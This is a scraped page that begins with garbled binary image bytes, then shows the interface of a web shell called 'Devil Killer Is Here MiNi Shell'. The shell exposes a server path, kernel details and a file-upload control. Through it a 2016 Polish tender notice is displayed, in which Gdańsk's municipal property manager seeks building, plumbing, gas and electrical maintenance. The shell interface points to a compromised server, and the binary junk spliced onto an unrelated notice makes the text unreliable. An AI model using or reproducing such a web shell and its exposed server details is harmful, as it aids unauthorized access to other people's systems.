JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160209/27844-N-2016.html

<p class="kh_header"><b>Gdańsk: Wykonywanie w roku 2016 robót konserwacyjnych, drobnych napraw oraz usuwania awarii w zakresie robót ogólnobudowlanych, sanitarnych i elektrycznych w budynkach i lokalach mieszkalnych oraz użytkowych  stanowiących własność gminy Gdańsk na terenie BOM 9</b><br>
<b>Numer ogłoszenia: 27844 - 2016; data zamieszczenia: 09.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie w roku 2016 robót konserwacyjnych, drobnych napraw oraz usuwania awarii w zakresie robót ogólnobudowlanych, sanitarnych i elektrycznych w budynkach i lokalach mieszkalnych oraz użytkowych  stanowiących własność gminy Gdańsk na terenie BOM 9.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonywanie w roku 2016 robót konserwacyjnych, drobnych napraw oraz usuwania awarii w zakresie robót ogólnobudowlanych, sanitarnych i elektrycznych w budynkach mieszkalnych i użytkowych stanowiących własność gminy Gdańsk oraz w lokalach mieszkalnych i użytkowych będących własnością gminy Gdańsk, a usytuowanych w budynkach wspólnot mieszkaniowych będących w zarządzie GZNK-SZB - na terenie  BOM  9.
	
<br>Struktura własności budynków oraz charakterystyka lokali mieszkalnych stanowiących własność Gminy Gdańsk:
<br>- ilość  budynków mieszkalnych w 100% będących własnością  Gminy Gdańsk      -       191
<br>- całkowita ilość lokali mieszkalnych do obsługi                                                 -      903
<br>- całkowita powierzchnia użytkowa lokali mieszkalnych do obsługi                     -  37.896 m2  
	
<br>Struktura własności budynków użytkowych oraz charakterystyka lokali użytkowych stanowiących własność gminy Gdańsk:                                                 
<br>- ilość budynków użytkowych  w 100% będących własnością  Gminy Gdańsk	 -        41
<br>- całkowita ilość lokali użytkowych do obsług                                                     -        95
<br>- całkowita powierzchnia użytkowa lokali użytkowych do obsługi	                    -  37.202  m2
<br>2.	Przedmiotem zamówienia może być wykonywanie w roku 2016 robót konserwacyjnych, drobnych napraw oraz usuwanie awarii w zakresie robót sanitarnych i elektrycznych w lokalach mieszkalnych i użytkowych będących własnością gminy Gdańsk, a usytuowanych w budynkach wspólnot mieszkaniowych w obcym zarządzie w których obowiązują uchwały o  rozdzielczości instalacji c.o. instalacji gazowej i elektrycznej.
Orientacyjna całkowita ilość budynków mieszkalnych i użytkowych wspólnot mieszkaniowych będących w zarządzie GZNK-SZB wynosi 2 szt., natomiast ilość lokali mieszkalnych i użytkowych w tych budynkach wynosi 2  szt.
	
<br>3.	Szczegółowy zakres rzeczowy robót:
<br>Konserwacje ogólnobudowlane
<br>1)	Konserwacje ogólnobudowlane, drobne naprawy  i usuwanie awarii w budynkach stanowiących własność Gminy Gdańsk, w częściach wspólnych budynków mieszkalnych (klatki schodowe, korytarze piwniczne, strychy, wózkarnie, suszarnie, pralnie i  pomieszczenia schronowe) oraz  w budynkach użytkowych wolnostojących z uwzględnieniem garaży, komórek gospodarczych, w.c. wolnostojących, - obejmują między innymi roboty w zakresie pokryć dachowych, elewacji budynków, stolarki okiennej i drzwiowej, przewodów dymowych, spalinowych i wentylacyjnych.
<br>a)	Zakres robót obejmuje w szczególności:
<br>-	miejscową likwidację przecieków wody poprzez przecięcie pęcherzy oraz wstawienie łat na powierzchni 	dachu,
<br>-	uszczelnienie pokrycia dachowego,
<br>-	czyszczenie i udrożnienie rynien i rur spustowych,
<br>-	konieczną wymianę rynien i rur spustowych i obróbek blacharskich,
<br>-	naprawę poprzez prostowanie, mocowanie i lutowanie drobnych uszkodzeń obróbek blacharskich,	daszków, pasów nadrynnowych i podrynnowych, parapetów, rynien, rur spustowych itp. łącznie z 	zabezpieczeniem antykorozyjnym,   
<br>-	uzupełnienie i uszczelnienie pokrycia dachówką oraz gąsiorów,
<br>-	reperację, wymianę włazów dachowych, elementów drabin, klamer włazowych, ław kominiarskich itp,
<br>-	miejscową reperację odparzonego tynku bez względu na rodzaj podłoża,
<br>-	uzupełnienie ubytków tynku (podłoża) wraz z przetarciem nowego tynku,
<br>-	usuniecie drobnych uszkodzeń w elementach elewacji budynku (gzymsy, elementy balkonowe, loggie, 	zadaszenia, murki oporowe),
<br>-	naprawa płyt balkonowych (np. naprawa tynków, odwodnienia, izolacji),
<br>-	naprawa ściany na klatce schodowej,
<br>-	naprawa ściany z ewentualnym odgrzybieniem i dociepleniem na klatce schodowej przy drzwiach 	wejściowych i w okolicach strychu,
<br>-	zabezpieczenie uszkodzonych stropów przez podparcie do czasu remontu,
<br>-	dopasowanie stolarki okiennej i drzwiowej na klatce schodowej, strychach, w piwnicy, oraz regulacja 	baskwili, zamków itp., szklenie, wymiana zamków i samozamykaczy,
<br>-	wymianę,  naprawę drzwi wejściowych i wiatrołapów,
<br>-	naprawę uszkodzeń posadzek, podłóg i schodów (np. poręczy, tralek, słupków schodowych, stopni i 	podstopni) w pomieszczeniach wspólnego użytkowania,
<br>-	odnowienie (malowanie) pomieszczeń wspólnego użytkowania,                     
<br>-	reperację czap kominowych, 
<br>-	przemurowanie główek kominowych,
<br>-	uzupełnienie spoinowania zewnętrznego komina względnie uzupełnienie lub wymiana tynku na kominie,
<br>-	przemurowanie pęknięć komina,
<br>-	wymianę i osadzenie drzwiczek wyczystnych,
<br>-	uzupełnienie kratek wentylacyjnych,
<br>-	wykonanie przełączeń wg wskazań opinii kominiarskich,
<br>-	zabezpieczenie lokali mieszkalnych po wykwaterowaniu włącznie z dorobieniem kluczy do pomieszczeń 	wspólnych, skrzynek listowych,
<br>-	osadzenie wyłazów dachowych, płotków śniegowych, drabinek kominiarskich,
<br>-	zabezpieczenie naderwanego lub zerwanego pokrycia dachowego,
<br>-	udrożnienie rynien i rur spustowych,
<br>-	uszczelnienie pokrycia dachówką oraz gąsiorów,
<br>-	zabezpieczenie uszkodzeń w elementach elewacji budynku (gzymsy, elementy balkonowe, loggie, 	zadaszenia,
<br>-	zabezpieczenie uszkodzonej ściany przez podparcie do czasu remontu,
<br>-	zabezpieczenie uszkodzonego komina,
<br>-	zabezpieczenie lokali mieszkalnych,
<br>-	inne roboty konserwacyjne nie wymienione wyżej.
<br>2)	Szczegółowy zakres rzeczowy robót w lokalach mieszkalnych do zasiedlenia, lokalach użytkowych i garażach przeznaczonych do wynajmu oraz w.c. wolnostojących stanowiących własność Gminy Gdańsk, którego realizacja będzie uzależniona od środków finansowych posiadanych przez zamawiającego  obejmuje:  
<br>-	wymianę, naprawę stolarki okiennej i drzwiowej,
<br>-	wymianę i naprawę  podłóg, posadzek i wykładzin podłogowych, 
<br>-	wymianę tynków oraz roboty odgrzybieniowe,
<br>-	odnowienie ścian i sufitów 
<br>-	wykonanie wentylacji z włączeniem do istniejących przewodów kominowych.
<br>3)	Naprawa chodników, schodów do budynku, osadzenie poręczy, opasek przy budynkach, wykonanie korytek odpływowych przy rurach spustowych.

<br>Konserwacje sanitarne
<br>1)	Konserwacje, a także drobne naprawy i usuwanie awarii instalacji sanitarnych oraz urządzeń i węzłów cieplnych w budynkach gminnych w lokalach i częściach wspólnych, w budynkach użytkowych gminnych wolnostojących, z uwzględnieniem garaży, komórek gospodarczych, wc. wolnostojących -  obejmują między innymi roboty w zakresie:
<br>a)	Instalacja wodno-kanalizacyjna:
<br>-	sprawdzenie prawidłowości działania wodomierza głównego, kontrola plomb,
<br>-	sprawdzenie stanu instalacji wodnej wraz z usunięciem nieszczelności, poprzez uszczelnienie połączeń 	bądź wymianę odcinka przewodów,
<br>-	uszczelnienie, wymiana i montaż zaworów odcinających mieszkaniowych i innych na wewnętrznej 	instalacji,
<br>-	montaż wodomierzy mieszkaniowych,
<br>-	czyszczenie i udrożnienie pionów i poziomów kanalizacyjnych oraz usuwanie miejscowych 	przecieków, poprzez uszczelnienie połączeń lub wymianę odcinków przewodów,
<br>-	odpompowanie fekaliów i wody z piwnic - z zalania powstałego w czasie likwidacji awarii,
<br>-	naprawa i wymiana rur wywietrznikowych oraz zaworów napowietrzających zamontowanych na	pionach kanalizacyjnych,
<br>-	okresowe oględziny i czyszczenie rewizji montaż brakujących rewizji na pionach bądź poziomach w 	piwnicach budynków,
<br>-	czyszczenie kratek, studzienek kanalizacji sanitarnej, deszczowej i studni wodomierzowych przy 	budynkach gminnych, na sieciach będących w eksploatacji Zamawiającego,
<br>-	naprawa, uzupełnienie i wymiana włazów studzienek rewizyjnych, wodomierzowych i szamb łącznie z 	ich zamontowaniem,
<br>-	uszczelnienie, wykonanie nowych studzienek rewizyjnych w piwnicach budynków lub na zewnątrz 	budynków, 
<br>-	naprawa lub wymiana urządzeń sanitarnych w pomieszczeniach wspólnego użytkowania,
<br>-	wymiana urządzeń w lokalach pod zasiedlenie,
<br>-	zamurowanie i otynkowanie wykutych otworów w ścianach i sufitach po robotach instalacyjnych,
<br>-	przeczyszczenie pionów i poziomów kanalizacyjnych, przykanalików ze studzienką przed budynkiem 	łącznie,
<br>-	uszczelnienie złącza i kielichów instalacji kanalizacyjnej.
<br>-	wymiana skorodowanych kształtek na instalacji wodnej od wodomierza głównego na budynku do punktu odbiorczego, który należy do lokatora,
<br>-	usunięcie ewentualnych przecieków instalacji wodociągowej wymiany uszczelnień od wodomierza 	głównego na budynku do punktu odbiorczego, który należy do lokatora,
<br>-	wymiana głowic w zaworach na pionach,
<br>-	w przypadku powstania innych awarii  należy odciąć dopływ wody  do  mieszkania, pionu lub budynku,
<br>-	zabezpieczenie instalacji wodno - kanalizacyjnej przed zamarzaniem w opróżnionych lokalach,	klatkach schodowych  i piwnicach opróżnionych budynków,
<br>-	odmrażanie instalacji wodno - kanalizacyjnej,
<br>-	inne roboty konserwacyjne nie wymienione wyżej.

<br>Prace do wykonania wyłącznie na pionach kanalizacyjnych poziomach w piwnicach budynków i na przykanaliku do pierwszej studzienki kanalizacyjnej, a w zakresie instalacji  wodociągowej na odcinku od wodomierza głównego do zaworów odcinających w lokalach.

<br>b)	Instalacja gazowa:
<br>-	usunięcie nieszczelności instalacji w budynku,
<br>-	kontrola funkcjonowania podejść pod gazomierz,
<br>-	przeprowadzenie prób szczelności instalacji lub jej części w razie podejrzeń o nieszczelność,
<br>-	okresowa kontrola zabezpieczenie kurka głównego, wymiana szafki i jej zamknięcia na zamek 	energetyczny oraz zaworów odcinających na urządzeniach, podejściach przed urządzeniami z oceną stanu   zabezpieczenia antykorozyjnego instalacji,
<br>-	konserwacja antykorozyjna instalacji żółtą farbą ochronną,
<br>-	zamurowanie i otynkowanie wykutych otworów w ścianach i sufitach po robotach instalacyjnych,
<br>-	w razie konieczności odcięcia i zaspawania podejścia pod urządzenia gazowe zamontowane przez 	najemcę bez zgody wynajmującego,
<br>-	awaryjna likwidacja odwadniaczy, naprawa lub wymiana kurków, 
<br>-	wymiana urządzeń w lokalach pod zasiedlenie,
<br>-	kontrola instalacji gazowej w lokalach do zasiedlenia,
<br>-	zlokalizowanie nieszczelności na instalacji gazowej od głównego kurka gazowego do przyboru włącznie,
<br>-	usuwanie przecieków gazu polegające na wymianie uszczelnienia instalacji gazowej wraz z wykonaniem próby szczelności,
<br>-	w przypadku powstania innych awarii gazowych odciąć dopływ gazu na instalacji gazowej.
<br>-	inne roboty konserwacyjne nie wymienione wyżej,
<br>Prace do wykonywania na instalacji od kurka głównego do urządzeń odbiorczych (z wyłączeniem tych urządzeń) w budynkach gminnych. 
<br>c)	Instalacja centralnego ogrzewania i ciepłej wody użytkowej:
<br>-	w uzasadnionych przypadkach, w uzgodnieniu z GPEC, spuszczenie i uzupełnienie czynnika grzewczego w instalacji,
<br>-	kontrola stanu technicznego instalacji z usunięciem występujących przecieków,
<br>-	uszczelnienie lub wymiana pojedynczych zaworów, grzejnikowych i zaworów przelotowych pod	pionami instalacji c.o. i cwu. oraz automatycznych odpowietrzników na pionach c.o.
<br>-	wymiana skorodowanych odcinków rur wewnętrznych instalacji, 
<br>-	przeprowadzanie przeglądów instalacji przed i po sezonie grzewczym, 
<br>-	regulacja instalacji cyrkulacyjnej ciepłej wody użytkowej, wymiana lub naprawa pomp cyrkulacyjnych,
<br>-	sprawdzenie i uzupełnienie ubytków izolacji ciepłochronnej przewodów c.o. i  c.w.u.,
<br>-	zamurowanie i otynkowanie wykutych otworów w ścianach i sufitach po robotach instalacyjnych,
<br>-	uzupełnienie manometrów i termometrów na rozdzielaczach instalacji c.o.,
<br>-	okresowe czyszczenie filtrów siatkowych na instalacji c.w.u. oraz na instalacjach c.o. w	pomieszczeniach rozdzielaczy,
<br>-	odmrażanie instalacji c.o. i c.w.u. w budynkach,
<br>-	uzupełnienie wody w instalacji wewnętrznej c.o. (dotyczy węzłów nie przekazanych do GPEC),
<br>-	odpowietrzenie instalacji c.o. ( dotyczy węzłów nie przekazanych do GPEC),
<br>-	usuwanie przecieków zaworów grzejnikowych,
<br>-	usuwanie przecieków na złączach grzejnikowych,
<br>-	usuwanie przecieków dławic zaworów,
<br>-	usuwanie przecieków odpowietrzników,
<br>-	usuwanie przecieków na korkach grzejnikowych,
<br>-	w przypadku powstania przecieków na złączach grzejnikowych należy zdemontować grzejnik i zabezpieczyć gałązki korkami,
<br>-	inne roboty konserwacyjne nie wymienione wyżej.

<br>Prace dotyczą całej instalacji wewnętrznej od:
<br>-	zaworów progowych w węźle cieplnym, gdy węzeł eksploatowany jest przez Zamawiającego, 
<br>-	rozdzielaczy, gdy węzeł cieplny jest eksploatowany przez GPEC. 
	
<br>2)	Szczegółowy zakres rzeczowy robót w lokalach mieszkalnych do zasiedlenia i użytkowych do wynajęcia, w.c. wolnostojących stanowiących własność Gminy Gdańsk, którego realizacja będzie uzależniona od środków finansowych posiadanych przez Zamawiającego, obejmuje:
<br>-	uszczelnienie wewnętrznej instalacji c.o. i c.w.u. (bez urządzeń odbiorczych),
<br>-	naprawę i wymianę wewnętrznej instalacji centralnego ogrzewania, zaworów grzejnikowych wraz z 	grzejnikami.

<br>Konserwacje elektryczne
<br>1)	Konserwacje instalacji elektrycznej, drobne naprawy oraz usuwanie awarii w części wspólnej budynków gminnych mieszkalnych, na klatkach schodowych, w piwnicach, korytarzach w.c. wspólnych oraz w budynkach  użytkowych gminnych wolnostojących z uwzględnieniem garaży, komórek gospodarczych, wc. wolnostojących obejmuje roboty  miedzy innymi w zakresie: 
<br>-	wymiany lub uzupełnienia żarówek w lampach na klatkach schodowych, piwnicach itp., 
<br>-	uzupełnienia brakujących kloszy,
<br>-	wymiany lub naprawy lamp, wyłączników, przycisków,
<br>-	naprawy, regulacji lub wymiany automatów schodowych,
<br>-	naprawy lub wymiany ograniczników mocy lub innych urządzeń ograniczających kradzież prądu,
<br>-	wymiany bezpieczników, gniazd i główek bezpiecznikowych w obwodzie administracyjnym budynku, 	wymiany dekli i pierścieni rozgałęźnych,
<br>-	utrzymania skrzynek elektrycznych piętrowych i głównych w czystości,
<br>-	sprawdzenia umocowania przewodów elektrycznych,
<br>-	wyszukiwania przerw i zwarć w instalacji elektrycznej, usuwanie przyczyn wraz z wymianą wypalonych końcówek w obwodzie elektrycznym administracyjnym budynku,
<br>-	usuwania uszkodzeń w instalacji odgromowej budynku,
<br>-	w przypadku dużego zakresu robót, zabezpieczenia obiektu przed skutkami awarii np. przez odłączenie 	instalacji,
<br>-	wymiany elementów tablic licznikowych z wymianą bezpieczników zalicznikowych obwodów 	mieszkaniowych, 
<br>-	wymiany i sprawdzenia połączeń w pierścieniach rozgałęźnych w lokalach mieszkalnych,
<br>-	wymiany elementów tablic licznikowych obwodów administracyjnych/lokatorskich, 
<br>-	wymiany zabezpieczeń obwodów przedlicznikowych, przeizolowanie puszek piętrowych lub ich wymiana,
<br>-	wymiany zabezpieczeń głównych pionów,
<br>-	podłączenia upalonych przewodów za tablicą główną,
<br>-	konserwacji i drobnych naprawy instalacji domofonowej,
<br>-	inne roboty konserwacyjne nie wymienione wyżej.
<br>2)	Konserwacja instalacji elektrycznej, drobne naprawy, usuwanie awarii w lokalach mieszkalnych zasiedlonych gminnych w budynkach gminnych i w budynkach wspólnot mieszkaniowych obejmuje: 
<br>-	wymianę przewodów, puszek rozgałęźnych, puszek instalacyjnych do gniazd i wyłączników (bez 	osprzętu),    
<br>-	wykonanie pomiarów ochronnych na instalacji oraz stanu izolacji i ochrony przeciwporażeniowej.
<br>3)	Szczegółowy zakres rzeczowy robót w lokalach mieszkalnych do zasiedlenia oraz lokalach użytkowych i garażach do wynajmu, w.c. wolnostojących stanowiących własność Gminy Gdańsk, którego realizacja będzie uzależniona od środków finansowych posiadanych przez Zamawiającego, obejmuje:
<br>-	naprawę i wymianę uszkodzonych przewodów instalacji elektrycznej z wyjątkiem osprzętu, 
<br>-	wykonanie pomiarów ochronnych na instalacji oraz stanu izolacji i ochrony przeciwporażeniowej,
<br>-	sprawdzenie instalacji elektrycznej wraz z pomiarami celem założenia licznika energii elektrycznej dla lokali mieszkalnych pod zasiedlenie.

<br>Konserwacji i drobnym naprawom podlega wewnętrzne zasilanie w energię od złącza kablowego Zakładu Energetycznego do odbiornika w budynkach gminnych, a w budynkach wspólnot mieszkaniowych instalacja od tablicy licznikowej do odbiorników.
<br>4.  Zapewnienie sprawności działania czujników tlenku węgla (czadu).
<br>W przypadku zgłoszenia przez najemcę sygnalizacji przez czujnik przekroczenia stężenia tlenku węgla (czadu) zapewnienie w ciągu 30 min. przyjazdu na miejsce zgłoszenia i ustalenie źródła emisji gazu. Wyłączenie z eksploatacji źródła powstania czadu, np.: pieca etażowego ogrzewania, piecyka gazowego do c.w.u., pieca kaflowego, westfalki, piecyka typu koza, kominka, kuchni gazowej, itp. Sprawdzenie szczelności i sprawności przewodów dymowych i wentylacyjnych.

<br>5.  Wykaz budynków mieszkalnych i użytkowych będących w zarządzie Zamawiającego oraz lokali mieszkalnych i użytkowych będących własnością gminy Gdańsk, a usytuowanych w budynkach wspólnot mieszkaniowych zarządzanych przez  GZNK-SZB  przedstawiony jest w załączniku Nr 1 do siwz Wykaz adresowy budynków BOM 9.

<br>6.	 Pozostałe warunki wykonania zamówienia określone są we wzorze umowy stanowiącym załącznik do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Przedmiotem zamówienia są roboty konserwacyjne w zakresie określonym w pkt 1 opisu przedmiotu zamówienia, których wartość wynosi do 6,5 % wartości zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 50.70.00.00-2, 50.72.00.00-8, 50.71.20.00-9, 50.71.10.00-2, 50.71.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 6 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać
<br>a)	w okresie ostatnich pięciu lat przed upływem terminu składania ofert minimum: 
<br>-  3 roboty polegające na wykonaniu robót ogólnobudowlanych w budynkach o wartości co najmniej 15 000,00 zł brutto  każda, 
<br>- 3 roboty polegające na wykonywaniu robót remontowych wewnętrznych instalacji sanitarnych w budynkach o wartości co najmniej 6 000,00 zł brutto każda, 
<br>-  3 roboty polegające na wykonaniu robót remontowych wewnętrznych instalacji elektrycznych w budynkach  o wartości co najmniej 3 000,00 zł brutto każda. 
<br>LUB
<br>b)	w okresie ostatnich trzech lat przed upływem terminu składania ofert minimum:
<br>- 3 usługi polegające na wykonywaniu usług ogólnobudowlanych konserwacyjnych w budynkach o wartości co najmniej 15 000,00 zł brutto każda,
<br>- 3 usługi polegające na wykonywaniu usług konserwacyjnych wewnętrznych instalacji sanitarnych w budynkach o wartości co najmniej 6 000,00 zł brutto każda,
<br>- 3 usługi polegające na wykonywaniu usług konserwacyjnych wewnętrznych instalacji elektrycznych w budynkach o wartości co najmniej 3 000,00 zł brutto każda.

<br>Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunki mogą spełniać łącznie.

<br>Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania odpowiednim potencjałem technicznym Wykonawca musi wykazać dysponowanie 1 samochodem. 

<br>W przypadku składania oferty przez wykonawców ubiegających się wspólnie o udzielenie zamówienia, w/w warunek musi spełniać co najmniej jeden wykonawca.

<br>Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie 11 osobami posiadającymi n/w uprawnienia tj: 
<br>a)	1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w 	budownictwie, upoważniające do kierowania robotami budowlanymi w specjalności konstrukcyjno-	budowlanej,
